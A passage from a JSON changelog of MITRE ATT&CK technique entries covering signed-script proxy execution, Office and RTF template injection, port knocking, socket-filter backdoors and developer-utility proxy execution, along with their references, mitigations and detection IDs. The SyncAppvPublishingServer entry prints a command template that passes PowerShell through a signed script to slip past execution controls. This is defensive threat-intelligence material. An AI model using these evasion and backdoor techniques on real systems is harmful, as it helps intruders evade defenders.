                            "description": "Jason Gerend. (2017, October 16). pubprn. Retrieved July 23, 2021.",
                            "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/pubprn"
                        },
                        {
                            "source_name": "Enigma0x3 PubPrn Bypass",
                            "description": "Nelson, M. (2017, August 3). WSH INJECTION: A CASE STUDY. Retrieved April 9, 2018.",
                            "url": "https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Atul Nair, Qualys"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:42:36.777000+00:00\", \"old_value\": \"2025-10-24 17:48:22.022000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.1\"}}}",
                    "previous_version": "2.1",
                    "version_change": "2.1 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1038: Execution Prevention",
                            "M1040: Behavior Prevention on Endpoint"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0528: Detecting Remote Script Proxy Execution via PubPrn.vbs"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--e6f19759-dde3-47fc-99cc-d9f5fa4ade60",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2024-02-06 16:20:41.647000+00:00",
                    "modified": "2026-04-15 22:42:56.654000+00:00",
                    "name": "SyncAppvPublishingServer",
                    "description": "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands. SyncAppvPublishingServer.vbs is a Visual Basic script associated with how Windows virtualizes applications (Microsoft Application Virtualization, or App-V).(Citation: 1 - appv) For example, Windows may render Win32 applications to users as virtual applications, allowing users to launch and interact with them as if they were installed locally.(Citation: 2 - appv)(Citation: 3 - appv)\n    \nThe SyncAppvPublishingServer.vbs script is legitimate, may be signed by Microsoft, and is commonly executed from `\\System32` through the command line via `wscript.exe`.(Citation: 4 - appv)(Citation: 5 - appv)\n\nAdversaries may abuse SyncAppvPublishingServer.vbs to bypass [PowerShell](https://attack.mitre.org/techniques/T1059/001) execution restrictions and evade defensive counter measures by \"living off the land.\"(Citation: 6 - appv)(Citation: 4 - appv) Proxying execution may function as a trusted/signed alternative to directly invoking `powershell.exe`.(Citation: 7 - appv)\n\nFor example,  [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands may be invoked using:(Citation: 5 - appv)\n\n`SyncAppvPublishingServer.vbs \"n; {PowerShell}\"`",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1216/002",
                            "external_id": "T1216.002"
                        },
                        {
                            "source_name": "4 - appv",
                            "description": "John Fokker. (2022, March 17). Suspected DarkHotel APT activity update. Retrieved February 6, 2024.",
                            "url": "https://www.trellix.com/en-ca/about/newsroom/stories/research/suspected-darkhotel-apt-activity-update/"
                        },
                        {
                            "source_name": "2 - appv",
                            "description": "Microsoft. (2022, November 3). Getting started with App-V for Windows client. Retrieved February 6, 2024.",
                            "url": "https://learn.microsoft.com/en-us/windows/application-management/app-v/appv-getting-started"
                        },
                        {
                            "source_name": "5 - appv",
                            "description": "Nick Landers, Casey Smith. (n.d.). /Syncappvpublishingserver.vbs. Retrieved February 6, 2024.",
                            "url": "https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/"
                        },
                        {
                            "source_name": "7 - appv",
                            "description": "Nick Landers. (2017, August 8). Need a signed alternative to Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered.. Retrieved September 12, 2024.",
                            "url": "https://x.com/monoxgas/status/895045566090010624"
                        },
                        {
                            "source_name": "3 - appv",
                            "description": "Raj Chandel. (2022, March 17). Indirect Command Execution: Defense Evasion (T1202). Retrieved February 6, 2024.",
                            "url": "https://www.hackingarticles.in/indirect-command-execution-defense-evasion-t1202/"
                        },
                        {
                            "source_name": "1 - appv",
                            "description": "SEONGSU PARK. (2022, December 27). BlueNoroff introduces new methods bypassing MoTW. Retrieved February 6, 2024.",
                            "url": "https://securelist.com/bluenoroff-methods-bypass-motw/108383/"
                        },
                        {
                            "source_name": "6 - appv",
                            "description": "Strontic. (n.d.). SyncAppvPublishingServer.exe. Retrieved February 6, 2024.",
                            "url": "https://strontic.github.io/xcyclopedia/library/SyncAppvPublishingServer.exe-3C291419F60CDF9C2E4E19AD89944FA3.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Shaul Vilkomir-Preisman"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:42:56.654000+00:00\", \"old_value\": \"2025-04-15 23:13:55.573000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1038: Execution Prevention"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0440: Detecting PowerShell Execution via SyncAppvPublishingServer.vbs Proxy Abuse"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--dc31fe1e-d722-49da-8f5f-92c7b5aff534",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2018-10-17 00:14:20.652000+00:00",
                    "modified": "2026-04-15 22:44:24.229000+00:00",
                    "name": "Template Injection",
                    "description": "Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft\u2019s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)\n\nProperties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.\n\nAdversaries may abuse these templates to initially conceal malicious code to be executed via user documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded.(Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched.(Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.(Citation: MalwareBytes Template Injection OCT 2017)\n\nAdversaries may also modify the <code>*\\template</code> control word within an .rtf file to similarly conceal then download malicious code. This legitimate control word value is intended to be a file destination of a template file resource that is retrieved and loaded when an .rtf file is opened. However, adversaries may alter the bytes of an existing .rtf file to insert a template control word field to include a URL resource of a malicious payload.(Citation: Proofpoint RTF Injection)(Citation: Ciberseguridad Decoding malicious RTF files)\n\nThis technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt.(Citation: Anomali Template Injection MAR 2018)(Citation: Talos Template Injection July 2017)(Citation: ryhanson phishery SEPT 2016)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1221",
                            "external_id": "T1221"
                        },
                        {
                            "source_name": "Talos Template Injection July 2017",
                            "description": "Baird, S. et al.. (2017, July 7). Attack on Critical Infrastructure Leverages Template Injection. Retrieved July 21, 2018.",
                            "url": "https://blog.talosintelligence.com/2017/07/template-injection.html"
                        },
                        {
                            "source_name": "ryhanson phishery SEPT 2016",
                            "description": "Hanson, R. (2016, September 24). phishery. Retrieved July 21, 2018.",
                            "url": "https://github.com/ryhanson/phishery"
                        },
                        {
                            "source_name": "Redxorblue Remote Template Injection",
                            "description": "Hawkins, J. (2018, July 18). Executing Macros From a DOCX With Remote Template Injection. Retrieved October 12, 2018.",
                            "url": "http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html"
                        },
                        {
                            "source_name": "Anomali Template Injection MAR 2018",
                            "description": "Intel_Acquisition_Team. (2018, March 1). Credential Harvesting and Malicious File Delivery using Microsoft Office Template Injection. Retrieved July 20, 2018.",
                            "url": "https://forum.anomali.com/t/credential-harvesting-and-malicious-file-delivery-using-microsoft-office-template-injection/2104"
                        },
                        {
                            "source_name": "Microsoft Open XML July 2017",
                            "description": "Microsoft. (2014, July 9). Introducing the Office (2007) Open XML File Formats. Retrieved July 20, 2018.",
                            "url": "https://docs.microsoft.com/previous-versions/office/developer/office-2007/aa338205(v=office.12)"
                        },
                        {
                            "source_name": "Ciberseguridad Decoding malicious RTF files",
                            "description": "Pedrero, R.. (2021, July). Decoding malicious RTF files. Retrieved November 16, 2021.",
                            "url": "https://ciberseguridad.blog/decodificando-ficheros-rtf-maliciosos/"
                        },
                        {
                            "source_name": "Proofpoint RTF Injection",
                            "description": "Raggi, M. (2021, December 1). Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption\u202fBeyond APT Actors\u202f. Retrieved December 9, 2021.",
                            "url": "https://www.proofpoint.com/us/blog/threat-insight/injection-new-black-novel-rtf-template-inject-technique-poised-widespread"
                        },
                        {
                            "source_name": "MalwareBytes Template Injection OCT 2017",
                            "description": "Segura, J. (2017, October 13). Decoy Microsoft Word document delivers malware through a RAT. Retrieved July 21, 2018.",
                            "url": "https://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/"
                        },
                        {
                            "source_name": "SANS Brian Wiltse Template Injection",
                            "description": "Wiltse, B.. (2018, November 7). Template Injection Attacks - Bypassing Security Controls by Living off the Land. Retrieved April 10, 2019.",
                            "url": "https://www.sans.org/reading-room/whitepapers/testing/template-injection-attacks-bypassing-security-controls-living-land-38780"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Brian Wiltse @evalstrings",
                        "Michael Raggi @aRtAGGI",
                        "Patrick Campbell, @pjcampbe11"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:44:24.229000+00:00\", \"old_value\": \"2025-10-24 17:49:28.862000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.4\"}}}",
                    "previous_version": "1.4",
                    "version_change": "1.4 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1017: User Training",
                            "M1031: Network Intrusion Prevention",
                            "M1042: Disable or Remove Feature or Program",
                            "M1049: Antivirus/Antimalware"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0566: Template Injection Detection - Windows"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2018-04-18 17:59:24.739000+00:00",
                    "modified": "2026-04-15 22:44:32.591000+00:00",
                    "name": "Traffic Signaling",
                    "description": "Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.\n\nAdversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.\n\nOn network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet.  Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.  Adversaries may use crafted packets to attempt to connect to one or more (open or closed) ports, but may also attempt to connect to a router interface, broadcast, and network address IP on the same port in order to achieve their goals and objectives.(Citation: Cisco Synful Knock Evolution)(Citation: Mandiant - Synful Knock)(Citation: Cisco Blog Legacy Device Attacks)  To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture.\n\nAdversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL)(Citation: AMD Magic Packet)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "command-and-control"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1205",
                            "external_id": "T1205"
                        },
                        {
                            "source_name": "Bleeping Computer - Ryuk WoL",
                            "description": "Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021.",
                            "url": "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/"
                        },
                        {
                            "source_name": "AMD Magic Packet",
                            "description": "AMD. (1995, November 1). Magic Packet Technical White Paper. Retrieved February 17, 2021.",
                            "url": "https://www.amd.com/system/files/TechDocs/20213.pdf"
                        },
                        {
                            "source_name": "Mandiant - Synful Knock",
                            "description": "Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved November 17, 2024.",
                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/synful-knock-acis/"
                        },
                        {
                            "source_name": "Cisco Synful Knock Evolution",
                            "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.",
                            "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices"
                        },
                        {
                            "source_name": "Hartrell cd00r 2002",
                            "description": "Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible backdoor. Retrieved October 13, 2018.",
                            "url": "https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631"
                        },
                        {
                            "source_name": "Cisco Blog Legacy Device Attacks",
                            "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.",
                            "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Josh Day, Gigamon",
                        "Tony Lee"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Network Devices",
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:44:32.591000+00:00\", \"old_value\": \"2025-10-24 17:48:43.225000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.5\"}}, \"iterable_item_removed\": {\"root['external_references'][7]\": {\"source_name\": \"GitLab WakeOnLAN\", \"description\": \"Perry, David. (2020, August 11). WakeOnLAN (WOL). Retrieved February 17, 2021.\", \"url\": \"https://gitlab.com/wireshark/wireshark/-/wikis/WakeOnLAN\"}}}",
                    "previous_version": "2.5",
                    "version_change": "2.5 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1037: Filter Network Traffic",
                            "M1042: Disable or Remove Feature or Program"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0524: Traffic Signaling (Port-knock / magic-packet \u2192 firewall or service activation) \u2013 T1205"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-07-01 18:23:25.002000+00:00",
                    "modified": "2026-04-15 22:44:49.425000+00:00",
                    "name": "Port Knocking",
                    "description": "Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.\n\nThis technique has been observed both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "command-and-control"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1205/001",
                            "external_id": "T1205.001"
                        },
                        {
                            "source_name": "Hartrell cd00r 2002",
                            "description": "Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible backdoor. Retrieved October 13, 2018.",
                            "url": "https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Network Devices",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:44:49.425000+00:00\", \"old_value\": \"2025-10-24 17:49:04.301000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1037: Filter Network Traffic"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0302: Port-knock \u2192 rule/daemon change \u2192 first successful connect (T1205.001)"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2022-09-30 21:18:41.930000+00:00",
                    "modified": "2026-04-15 22:45:22.463000+00:00",
                    "name": "Socket Filters",
                    "description": "Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.\n\nTo establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria.(Citation: haking9 libpcap network sniffing) Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. Communication with these socket filters may also be used in conjunction with [Protocol Tunneling](https://attack.mitre.org/techniques/T1572).(Citation: exatrack bpf filters passive backdoors)(Citation: Leonardo Turla Penquin May 2020)\n\nFilters can be installed on any Unix-like platform with `libpcap` installed or on Windows hosts using `Winpcap`.  Adversaries may use either `libpcap` with `pcap_setfilter` or the standard library function `setsockopt` with `SO_ATTACH_FILTER` options. Since the socket connection is not active until the packet is received, this behavior may be difficult to detect due to the lack of activity on a host, low CPU overhead, and limited visibility into raw socket usage.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "command-and-control"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1205/002",
                            "external_id": "T1205.002"
                        },
                        {
                            "source_name": "exatrack bpf filters passive backdoors",
                            "description": "ExaTrack. (2022, May 11). Tricephalic Hellkeeper: a tale of a passive backdoor. Retrieved October 18, 2022.",
                            "url": "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf"
                        },
                        {
                            "source_name": "Leonardo Turla Penquin May 2020",
                            "description": "Leonardo. (2020, May 29). MALWARE TECHNICAL INSIGHT TURLA \u201cPenquin_x64\u201d. Retrieved March 11, 2021.",
                            "url": "https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf"
                        },
                        {
                            "source_name": "haking9 libpcap network sniffing",
                            "description": "Luis Martin Garcia. (2008, February 1). Hakin9 Issue 2/2008 Vol 3 No.2 VoIP Abuse: Storming SIP Security. Retrieved October 18, 2022.",
                            "url": "http://recursos.aldabaknocking.com/libpcapHakin9LuisMartinGarcia.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "CrowdStrike",
                        "Tim (Wadhwa-)Brown"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:45:22.463000+00:00\", \"old_value\": \"2025-10-24 17:48:19.274000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}}, \"iterable_item_removed\": {\"root['external_references'][2]\": {\"source_name\": \"crowdstrike bpf socket filters\", \"description\": \"Jamie Harries. (2022, May 25). Hunting a Global Telecommunications Threat: DecisiveArchitect and Its Custom Implant JustForFun. Retrieved October 18, 2022.\", \"url\": \"https://www.crowdstrike.com/blog/how-to-hunt-for-decisivearchitect-and-justforfun-implant/\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1037: Filter Network Traffic"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0162: Socket-filter trigger \u2192 on-host raw-socket activity \u2192 reverse connection (T1205.002)"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--ff25900d-76d5-449b-a351-8824e62fc81b",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-05-31 21:31:39.262000+00:00",
                    "modified": "2026-04-15 22:45:17.637000+00:00",
                    "name": "Trusted Developer Utilities Proxy Execution",
                    "description": "Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.\n\nSmart App Control is a feature of Windows that blocks applications it considers potentially malicious from running by verifying unsigned applications against a known safe list from a Microsoft cloud service before executing them.(Citation: Microsoft Smart App Control) However, adversaries may leverage \"reputation hijacking\" to abuse an operating system\u2019s trust of safe, signed applications that support the execution of arbitrary code. By leveraging [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127) to run their malicious code, adversaries may bypass Smart App Control protections.(Citation: Elastic Security Labs)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "execution"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
